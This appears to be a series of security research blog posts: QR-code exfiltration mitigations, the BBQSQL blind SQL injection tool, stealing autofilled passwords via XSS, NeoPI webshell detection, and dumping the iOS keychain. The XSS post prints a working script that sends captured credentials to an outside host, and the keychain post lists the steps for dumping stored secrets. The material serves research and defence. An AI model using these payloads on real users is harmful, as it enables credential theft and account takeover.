To speak briefly about preventing the use of tools like this for getting data off of your network: as with most things in security, finding a balance between usability and security is key. The extreme on the usability end would be to keep an entirely open network without any controls to prevent or detect data loss. The opposite extreme would be to unplug all your computers and shred their hard drives. Considerations in finding the middle ground as it relates to DLP include:

  • The value of your data to your organization.
  • The value of your data to your adversaries.
  • The means of your organization to implement security mechanisms.
  • The means of your adversaries to defeat security mechanisms.

Once your organization has decided what its security posture should be, it can attempt to mitigate risk accordingly. What risk remains must be accepted. For most organizations, the risk presented by a tool like the one described above is acceptable. That being said, techniques for mitigating its risk might include:

  • Disallowing video capture devices in sensitive areas (already common practice in some organizations).
  • Writing IDS signatures for the JavaScript used to generate the QRCodes (this is hard because JS is easily obfuscated and packed).
  • Limiting access within your organization to sensitive information.
  • Trying to prevent the QRCode-creating portion of the tool from reaching your computers.
    • Physical Protections (USB port locks, removing CD Drives, etc.)
    • Network Protections (segmentation, content filtering, etc.)

Good luck ;)

Apparently “QR Code” is a registered trademark of DENSO WAVE INCORPORATED.

DEF CON 20 – Neohapsis New Tool BBQSQL to Make its Debut!

By Scott Behrens and Ben Toews

Ben and I have been grinding away on slides and code in preparation for our talk at DEF CON 20.  Without letting all of the cats out of the bag, I wanted to take a second to provide a little more context on our talk and research before we present our new tools at the conference.

BBQSQL is a SQL injection framework specifically designed to be hyper fast, database agnostic, easy to setup, and easy to modify.  The tool is extremely effective at exploiting a particular type of SQL injection flaw known as blind/semi-blind SQL injection.  When doing application security assessments we often uncover SQL vulnerabilities that are difficult to exploit. While current tools have an enormous amount of capability, when you can’t seem to get them to work you are out of luck.  We frequently end up writing custom scripts to help aid in the tricky data extraction, but a lot of time is invested in developing, testing and debugging these scripts.

BBQSQL helps automate the process of exploiting tricky blind SQL injection.  We developed a very easy UI to help you setup all the requirements for your particular vulnerability and provide real time configuration checking to make sure your data looks right.  On top of being easy to use, it was designed using the event driven concurrency provided by Python’s gevent.  This allows BBQSQL to run much faster than existing single/multithreaded applications.
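To make the speed argument concrete, here is a minimal sketch of the core loop a blind-injection tool has to run; the oracle below is simulated locally, but in practice every call is an HTTP request, which is exactly the kind of workload gevent lets BBQSQL issue concurrently (the query fragment in the comment and all names are illustrative, not BBQSQL’s actual internals):

```python
SECRET = "admin_hash"  # stands in for the data behind the injection point

def oracle(pos: int, guess: int) -> bool:
    """Simulates a boolean-blind query like:
    ... AND ASCII(SUBSTRING(secret, pos, 1)) > guess
    In real life this is one HTTP request per call."""
    if pos > len(SECRET):
        return False
    return ord(SECRET[pos - 1]) > guess

def extract_char(pos: int) -> int:
    # Binary search over the ASCII range: ~7 requests per character
    # instead of up to 127 with linear guessing.
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(pos, mid):   # true means the char code is > mid
            lo = mid + 1
        else:
            hi = mid
    return lo  # 0 means there is no character at this position

def extract() -> str:
    out, pos = [], 1
    while True:
        code = extract_char(pos)
        if code == 0:
            break
        out.append(chr(code))
        pos += 1
    return "".join(out)
```

Since each `extract_char` call is independent, many positions (or many rows) can be probed in flight at once, which is where the event-driven concurrency pays off.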

We will be going into greater detail on the benefits of this kind of concurrency during the talk. We will also talk a bit about character frequency analysis and some ways BBQSQL uses it to extract data faster.  We’ll be doing a demo, too, to show you how to use the UI as well as how to import and export attack configs.  Here are a few screenshots to get you excited!

BBQSQL User Interface

BBQSQL Performing Blind SQL Injection

If you come see the talk, we would love to hear your thoughts!

Abusing Password Managers with XSS

By Ben Toews

One common and effective mitigation against Cross-Site Scripting (XSS) is to set the HTTPOnly flag on session cookies. This will generally prevent an attacker from stealing users’ session cookies with XSS. There are ways of circumventing this (e.g. the HTTP TRACE method), but generally speaking, it is fairly effective. That being said, an attacker can still cause significant damage without being able to steal the session cookie.

A variety of client-side attacks are possible, but an attacker is also often able to circumvent Cross-Site Request Forgery (CSRF) protections via XSS and thereby submit various forms within the application. The worst-case scenario with this type of attack would be that there is no confirmation for email address or password changes and the attacker can change users’ passwords. From an attacker’s perspective this is valuable, but not as valuable as being able to steal a user’s session. By resetting the password, the attacker is giving away his presence, and the extent to which he is able to masquerade as another user is limited. While stealing the session cookie may be the most commonly cited method for hijacking user accounts, other means exist that don’t involve changing user passwords.

All modern browsers come with some functionality to remember user passwords. Additionally, users will often install third-party applications to manage their passwords for them. All of these solutions save time for the user and generally help to prevent forgotten passwords. Third party password managers such as LastPass are also capable of generating strong, application specific passwords for users and then sending them off to the cloud for storage. Functionality such as this greatly improves the overall security of the username/password authentication model. By encouraging and facilitating the use of strong application specific passwords, users need not be as concerned with unreliable web applications that inadequately protect their data. For these and other reasons, password managers such as LastPass are generally considered within the security industry to be a good idea. I am a long time user of LastPass and have (almost) nothing but praise for their service.

An issue with both in-browser and third-party password managers that gets hardly any attention is how they can be abused by XSS. Because many of these password managers automatically fill login forms, an attacker can use JavaScript to read the contents of the form once it has been filled. The lack of attention this topic receives made me curious to see how exploitable it actually would be. For the purpose of testing, I built a simple PHP application with a functional login page as well as a second page that is vulnerable to XSS (find them here). I then proceeded to experiment with different JavaScript, attempting to steal user credentials with XSS from the following password managers:

  • LastPass (Current version as of April 2012)
  • Chrome (version 17)
  • Firefox (version 11)
  • Internet Explorer (version 9)

I first visited my login page and entered my password. If the password manager asked me if I wanted it to be remembered, I said yes. I then went to the XSS vulnerable page in my application and experimented with different JavaScript, attempting to access the credentials stored by the browser or password manager. I ended up writing some JavaScript that was effective against the password managers listed above with the exception of IE:

<script type="text/javascript">
    ex_username = '';
    ex_password = '';
    inter = '';
    function attack(){
        ex_username = document.getElementById('username').value;
        ex_password = document.getElementById('password').value;
        if(ex_username != '' || ex_password != ''){
            document.getElementById('xss').style.display = 'none';
            request=new XMLHttpRequest();
            url = "http://btoe.ws/pwxss?username="+ex_username+"&password="+ex_password;
            request.open("GET",url,true);
            request.send();
            document.getElementById('xss').style.visibility='hidden';
            window.clearInterval(inter);
        }
    }
    document.write("\
    <div id='xss'>\
    <form method='post' action='index.php'>\
    username:<input type='text' name='username' id='username' value='' autocomplete='on'>\
    password:<input type='password' name='password' id='password' value='' autocomplete='on'>\
    <input type='submit' name='login' value='Log In'>\
    </form>\
    </div>\
    ");
    inter = window.setInterval("attack()",100);
</script>

All that this code does is create a fake login form on the XSS-vulnerable page and then wait for it to be filled in by the browser or password manager. When the fields are filled, the JavaScript takes the values and sends them off to another server via a simple Ajax request. At first I had attempted to harness the onchange event of the form fields, but it turns out that this is unreliable across browsers (also, LastPass seems to mangle the form and input field DOM elements for whatever reason). Using window.setInterval, while less elegant, is more effective.

If you want to try out the above code, go to http://boomer.neohapsis.com/pwxss and login (username:user1 password:secret). Then go to the reflections page and enter the slightly modified code listed there into the text box. If you told your password manager to remember the password for the site, you should see an alert box with the credentials you previously entered. Please let me know if you find any vulns aside from XSS in this app.

To be honest, I was rather surprised that my simple trick worked in Chrome and Firefox. The LastPass plugin in the Chrome browser operates on the DOM level like any other Chrome plugin, meaning that it can’t bypass event listeners that are watching for form submissions. The browsers, on the other hand could put garbage into the form elements in the DOM and wait until after the onsubmit event has fired to put the real credentials into the form. This might break some web applications that take action based on the onchange event of the form inputs, but if that is a concern, I am sure that the browsers could somehow fill the form fields without triggering this event.

The reason why this code doesn’t work in IE (aside from the non-IE-friendly XHR request) is that the IE password manager doesn’t automatically fill in user credentials. IE also seems to be the only one of the bunch that ties a set of credentials to a specific page rather than to an entire domain. While these both may be inconveniences from a usability perspective, they (inadvertently or otherwise) improve the security of the password manager.

While this is an attack vector that doesn’t get much attention, I think that it should. XSS is a common problem, and developers get an unrealistic sense of security from the HTTPOnly cookie flag. This flag is largely effective in preventing session hijacking, but user credentials may still be at risk. While I didn’t get a chance to check them out when researching this, I would not be surprised if Opera and Safari had the same types of behavior.

I would be interested to hear a discussion of possible mitigations for this vulnerability. If you are a browser or browser-plugin developer or just an ordinary hacker, leave a comment and let me know what you think.

Edit: Prompted by some of the comments, I wrote a little script to demo how you could replace the whole document.body with that of the login page and use push state to trick a user into thinking that they were on the login page. https://gist.github.com/2552844

NeoPI in the Wild

By Scott Behrens

NeoPI was a project developed by myself and Ben Hagen to aid in the detection of obfuscated and encrypted webshells.  I recently came across an article about Webacoo shell and a rewrite of this php backdoor to avoid detection from NeoPI.

Webacoo’s developer used a few interesting techniques to avoid detection.  The first technique was to avoid signature based detection by using the function ‘strrev’:

$b=strrev("edoced_4"."6esab")

This bypasses our traditional signature-based detection and also lends itself to a few other signature-evasion techniques.  Another webshell surfaced after NeoPI’s release that uses similar techniques to avoid signature-based detection.  Another example could be the following (as seen in https://elrincondeseth.Wordpress.com/2011/08/17/bypasseando-neopi/):

$b = 'bas'.'e64'.'_de'.'code';

We can see that just by breaking up the word, the risk of detection is highly mitigated.  As I suggested at B-Sides, signature-based detection is complementary to the other tests in NeoPI but, by itself, ineffective.  The methods described above completely thwart this test’s effectiveness.

But one thing these techniques must do at some point is actually eval the code.  Webacoo for example uses the following:

eval($b(str_replace(" ","","a W Y o a X …SNIP

By developing a regex that looks for eval and a variable holding the global function, we can flag this file as malicious.  After running this test against a WordPress server with Webacoo’s shell, I observed the following:

 

Figure 1 – Webacoo identified as suspicious in eval test

NeoPI was able to detect the function and flagged it as malicious.  This particular use of eval isn’t very common and I have really only seen it used in malware.  That being said, functions.php was also flagged, so I imagine this test can still have many false positives and should be used to aid manual investigation of the files identified.
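A hedged sketch of the kind of check described above follows; the exact pattern NeoPI ships may differ, and the regex here is deliberately narrow:

```python
import re

# Flag eval() whose callee is a PHP variable, e.g. eval($b(...)) --
# the shape that Webacoo-style shells must eventually produce, since
# the obfuscated code has to be eval'd at some point.
EVAL_VIA_VARIABLE = re.compile(r'eval\s*\(\s*\$[A-Za-z_]\w*\s*\(',
                               re.IGNORECASE)

def flag_eval_test(php_source: str) -> bool:
    return bool(EVAL_VIA_VARIABLE.search(php_source))
```

Note that a plain `eval("...")` with a literal string is intentionally not matched, which keeps the false-positive rate down at the cost of missing direct eval calls.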

Another tweak Webacoo’s developer made was to insert spaces between each character of a base64-encoded string.  The function str_replace() is called to remove each space before the code is base64_decoded and eval’d.

In order to thwart this particular obfuscation technique, I went ahead and modified the entropy function to strip spaces within the data the function is analyzing. The screenshot below shows a scan against 1752 PHP files in WordPress, with the entropy test now flagging webacoo.php as potentially malicious. This increased NeoPI’s effectiveness at detecting webacoo.php, but it is more of a stopgap solution, as the attacker can craft other junk characters to lower the shell’s entropy and index of coincidence. Some additional thought and research is needed on potentially looking for these complicated search-and-replace functions to determine whether the data being obfuscated is malicious.

 

Figure 2 – Test results after modifying entropy code results in higher entropy of webacoo.php
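The space-stripping tweak amounts to removing the junk characters before measuring Shannon entropy. A simplified version (NeoPI’s actual implementation may differ in detail):

```python
import math
from collections import Counter

def entropy(data: str, junk: str = " ") -> float:
    # Strip the junk characters first, then compute Shannon entropy in
    # bits per character over what remains.
    data = "".join(ch for ch in data if ch not in junk)
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())
```

With this change, space-padded base64 such as "a W Y o a X ..." scores the same as its unpadded form, which is what pushes webacoo.php up the rankings.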

The latest version of the code can be checked out at http://github.com/Neohapsis/NeoPI which includes these enhancements.

As for improving the effectiveness of the other tests, I am looking into the possibility of identifying base64 encodings without looking for the function name.  This technique may be helpful in building a ratio of upper-case to lower-case characters and seeing if there is a trend in files that use obfuscation.

If anyone has interesting techniques for defeating NeoPI please respond to this post and I’ll look at adding more detection mechanisms to this tool!

“Researchers steal iPhone passwords in 6 minutes”…true…but not the whole story

By Patrick Toomey

Direct link to keychaindumper (for those that want to skip the article and get straight to the code)

So, a few weeks ago a wave of articles hit the usual sites about research that came out of the Fraunhofer Institute (yes, the MP3 folks) regarding some issues found in Apple’s Keychain service.  The vast majority of the articles, while factually accurate, didn’t quite present the full details of what the researchers found.  What the researchers actually found was more nuanced than what was reported.  But, before we get to what they actually found, let’s bring everyone up to speed on Apple’s keychain service.

Apple’s keychain service is a library/API provided by Apple that developers can use to store sensitive information on an iOS device “securely” (a similar service is provided in Mac OS X).  The idea is that instead of storing sensitive information in plaintext configuration files, developers can leverage the keychain service to have the operating system store sensitive information securely on their behalf.  We’ll get into what is meant by “securely” in a minute, but at a high level the keychain encrypts (using a unique per-device key that cannot be exported off of the device) data stored in the keychain database and attempts to restrict which applications can access the stored data.  Each application on an iOS device has a unique “application-identifier” that is cryptographically signed into the application before being submitted to the Apple App store.  The keychain service restricts which data an application can access based on this identifier.  By default, applications can only access data associated with their own application-identifier.  Apple realized this was a bit restrictive, so they also created another mechanism that can be used to share data between applications by using “keychain-access-groups”.  As an example, a developer could release two distinct applications (each with their own application-identifier) and assign each of them a shared access group.  When writing/reading data to the keychain a developer can specify which access group to use.  By default, when no access group is specified, the application will use the unique application-identifier as the access group (thus limiting access to the application itself).  Ok, so that should be all we need to know about the Keychain.  If you want to dig a little deeper Apple has a good doc here.

Ok, so we know the keychain is basically a protected storage facility that the iOS kernel delegates read/write privileges to based on the cryptographic signature of each application.  These cryptographic signatures are known as “entitlements” in iOS parlance.  Essentially, an application must have the correct entitlement to access a given item in the keychain.  So, the most obvious way to go about attacking the keychain is to figure out a way to sign fake entitlements into an application (ok, patching the kernel would be another way to go, but that is a topic for another day).  As an example, if we can sign our application with the “apple” access group then we would be able to access any keychain item stored using this access group.  Hmmm…well, it just so happens that we can do exactly that with the “ldid” tool that is available in the Cydia repositories once you jailbreak your iOS device.  When a user jailbreaks their phone, the portion of the kernel responsible for validating cryptographic signatures is patched so that any signature will validate. So, ldid basically allows you to sign an application using a bogus signature. But, because it is technically signed, a jailbroken device will honor the signature as if it were from Apple itself.

Based on the above description, so long as we can determine all of the access groups that were used to store items in a user’s keychain, we should be able to dump all of them, sign our own application to be a member of all of them using ldid, and then be allowed access to every single keychain item in a user’s keychain.  So, how do we go about getting a list of all the access group entitlements we will need?  Well, the keychain is nothing more than a SQLite database stored in:

/var/Keychains/keychain-2.db

And, it turns out, the access group is stored with each item that is stored in the keychain database.  We can get a complete list of these groups with the following query:

SELECT DISTINCT agrp FROM genp
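That enumeration step is plain SQLite, so it can be sketched in a few lines of Python run against the database path above (or a copy pulled off a jailbroken device); the function name is mine, not keychain_dumper’s:

```python
import sqlite3

def access_groups(db_path="/var/Keychains/keychain-2.db"):
    # Collect every distinct keychain access group from the genp table.
    con = sqlite3.connect(db_path)
    try:
        rows = con.execute("SELECT DISTINCT agrp FROM genp").fetchall()
    finally:
        con.close()
    return sorted(r[0] for r in rows)
```

Each returned group becomes one entitlement entry in the XML file we sign into our tool next.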

Once we have a list of all the access groups we just need to create an XML file that contains all of these groups and then sign our own application with ldid.  So, I created a tool that does exactly that called keychain_dumper.  You can first get a properly formatted XML document with all the entitlements you will need by doing the following:

./keychain_dumper -e > /var/tmp/entitlements.xml

You can then sign all of these entitlements into keychain_dumper itself (please note the lack of a space between the flag and the path argument):

ldid -S/var/tmp/entitlements.xml keychain_dumper

After that, you can dump all of the entries within the keychain:

./keychain_dumper

If all of the above worked you will see numerous entries that look similar to the following:

Service: Dropbox
Account: remote
Entitlement Group: R96HGCUQ8V.*
Label: Generic
Field: data
Keychain Data: SenSiTive_PassWorD_Here

Ok, so what does any of this have to do with what was being reported on a few weeks ago?  We basically just showed that you can in fact dump all of the keychain items using a jailbroken iOS device.  Here is where the discussion is more nuanced than what was reported.  The steps we took above will only dump the entire keychain on devices that have no PIN set or are currently unlocked.  If you set a PIN on your device, lock the device, and rerun the above steps, you will find that some keychain data items are returned, while others are not.  You will find a number of entries now look like this:

Service: Dropbox
Account: remote
Entitlement Group: R96HGCUQ8V.*
Label: Generic
Field: data
Keychain Data: <Not Accessible>

This fundamental point was either glossed over or simply ignored in every single article I happened to come across (I’m sure at least one person will find the article that does mention this point :-)).  This is an important point, as it completely reframes the discussion.  The way it was reported, it looks like the point is to show how insecure iOS is.  In reality the point should have been to show how security is all about trading off various factors (security, convenience, etc.).  This point was not lost on Apple, and the keychain allows developers to choose the appropriate level of security for their application.  Stealing a small section from the keychain document from Apple, they allow six levels of access for a given keychain item:

CFTypeRef kSecAttrAccessibleWhenUnlocked;
CFTypeRef kSecAttrAccessibleAfterFirstUnlock;
CFTypeRef kSecAttrAccessibleAlways;
CFTypeRef kSecAttrAccessibleWhenUnlockedThisDeviceOnly;
CFTypeRef kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly;
CFTypeRef kSecAttrAccessibleAlwaysThisDeviceOnly;

The names are pretty self descriptive, but the main thing to focus in on is the “WhenUnlocked” accessibility constants.  If a developer chooses the “WhenUnlocked” constant then the keychain item is encrypted using a cryptographic key that is created using the user’s PIN as well as the per-device key mentioned above.  In other words, if a device is locked, the cryptographic key material does not exist on the phone to decrypt the related keychain item.  Thus, when the device is locked, keychain_dumper, despite having the correct entitlements, does not have the ability to access keychain items stored using the “WhenUnlocked” constant.  We won’t talk about the “ThisDeviceOnly” constant, but it is basically the most strict security constant available for a keychain item, as it prevents the items from being backed up through iTunes (see the Apple docs for more detail).

If a developer does not specify an accessibility constant, a keychain item will use “kSecAttrAccessibleWhenUnlocked”, which makes the item available only when the device is unlocked.  In other words, applications that store items in the keychain using the default security settings would not have been leaked using the approach used by Fraunhofer and/or keychain_dumper (I assume we are both just using the Keychain API as it is documented).  That said, quite a few items appear to be set with “kSecAttrAccessibleAlways”.  Such items include wireless access point passwords, MS Exchange passwords, etc.  So, what was Apple thinking; why does Apple let developers choose among all these options?  Well, let’s use some pretty typical use cases to think about it.  A user boots their phone and they expect their device to connect to their wireless access point without intervention.  I guess that requires that iOS be able to retrieve their access point’s password regardless of whether the device is locked or not.  How about MS Exchange?  Let’s say I lost my iPhone on the subway this morning.  Once I get to work I let the system administrator know and they proceed to initiate a remote wipe of my Exchange data.  Oh, right, my device would have to be able to login to the Exchange server, even when locked, for that to work.  So, Apple is left in the position of having to balance the privacy of user’s data with a number of use cases where less privacy is potentially worthwhile.  We can probably go through each keychain item and debate whether Apple chose the right accessibility constant for each service, but I think the main point still stands.

Wow…that turned out to be way longer than I thought it would be.  Anyway, if you want to grab the code for keychain_dumper to reproduce the above steps yourself you can grab the code on github.  I’ve included the source as well as a binary just in case you don’t want/have the developer tools on your machine.  Hopefully this tool will be useful for security professionals that are trying to evaluate whether an application has chosen the appropriate accessibility parameters during blackbox assessments. Oh, and if you want to read the original paper by Fraunhofer you can find that here.